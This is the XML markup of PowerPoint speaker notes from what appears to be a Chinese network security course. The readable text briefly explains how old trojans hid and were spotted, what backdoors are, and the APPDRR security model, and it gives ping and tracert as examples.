                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>win9x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>时代，简单的注册为系统进程就可以从任务栏中消失，就实现了隐藏。在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Window2000</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，这种方法是不行了，在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>下面（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ctrl+Alt+Del</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以看到所有正在运行的进程，从而发现木马的进程，也就意味着可以删除它。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304"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4BBDE54-FE55-47B1-A9BB-02E721DB45F1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>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anose="02020603050405020304"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后门一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CD7F3948-5E2B-4E76-80CA-D6145822F124}"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4D0C9832-35E7-4E15-827D-BDEE6D4E9660}"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solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>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7C59652A-5870-46AA-A352-14569C35A7EC}"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70CF1A4D-13D6-4106-B1BC-7EDDDAF3B39F}"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599314C-4AEE-40DE-ACFD-99373003F87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CDCE72-240E-411E-9962-C69A7A880A2E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU"/>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572418" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572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1207372-B62C-4FA4-8321-1982454EA975}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318466" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318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54A4CB-5D61-4DBC-93C7-E42E5160DC71}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3880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23BC2A8-7D1D-484A-B572-2F52FA2157FF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319490" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3194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CCDEFE-7D86-49DF-AA2A-755A9D6CB7BE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320514" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3205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BE0F0F-4005-4C97-95FE-EA054E0D72BF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322562" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3225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944896-6B1C-45EC-B642-95533F8203A7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323586" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3235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D9E78D2-48AC-4307-9AC1-C3AF58933695}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324610" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3246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3BC032-7902-4B16-89D4-E07C13D56ECA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3256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ADFEF85-65DE-420A-A397-898837189A5C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3266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F4C7EE-D1D2-441F-B081-0092D83D97BE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328706" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3287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F6A8F2-F8DB-4196-A409-9F89DD3C1D7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU"/>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574466" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5744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9FE73D-4354-4421-89E6-0725766CDD8A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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18AAD9-FAFB-463D-AF50-DAA32B62BB46}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331778" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3317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69CC1A-FC05-47A1-A5B4-AB4DAFB4055A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3328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06241E0-5D28-469D-9873-4643775C78AF}"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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141316"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CEF93D1-0A62-4AC3-B5DC-4D50CB55B6E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FF95AC-22A7-4341-BD32-3BD843AF4C0B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3860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52F72E-C1CD-4245-956B-93470F336806}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3338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E16FB0-B854-4457-B0F0-1C035B1F2454}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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F3447A-2315-43EF-B0AB-01058080823F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3358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9E45DA-7D25-47A4-9B33-30080B4C7146}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336898" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3368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APPDRR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>模型还隐含了网络安全的相对性和动态螺旋上升的过程，即：不存在百分之百的静态的网络安全，网络安全表现为一个不断改进的过程。通过风险评估、安全策略、系统防护、动态检测、实时响应和灾难恢复六环节的循环流动，网络安全逐渐地得以完善和提高，从而实现保护网络资源的网络安全目标。</a:t>
            </a:r>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63B2E1-8E0D-4588-B302-A791B89D5136}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337922" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3379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E6CAC9-3CE4-4CCA-922A-2323D490C738}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338946" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3389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7C108E-CA02-479C-9533-7D992C7FDFB6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3399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319862E-F5BA-4501-AD58-90402C1C8534}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340994" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3409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D40927-F197-4D14-BB7B-42B45351ABAA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3481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D51270-DECB-4BCE-AF9D-9226C1C426B5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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82843F-35DD-4C0F-AD25-76EA4A689F2A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360450" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3604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anose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204803" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>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A8916B5-0DA1-45BA-B0A9-7F44E619AF01}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU"/>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN"/>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endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204"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0F44F8-0E30-4A0D-8068-8F33666D5743}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185346" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185347" name="Rectangle 1027"/>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E162F00-EC90-4472-BE7B-62869B60EF53}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189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41238F-0AEC-4B71-A705-89CA1B6AD163}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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7ACF6F4-82DC-45C7-AC6A-2934B94F6B45}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188418" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188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86B867-7FFF-41B2-8C64-D12B4E05B832}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180226" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180227" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="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6AA0ECE-9260-4928-85D7-F2B53552C3F5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183298" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183299" name="Rectangle 1027"/>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535940-13DB-4603-ACB7-0B35FA20663F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1812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B950BA9-5D44-4653-9D33-40515475438E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5029200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Eg:ping www.sjtu.edu.cn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Eg:tracert www.sjtu.edu.cn</a:t>
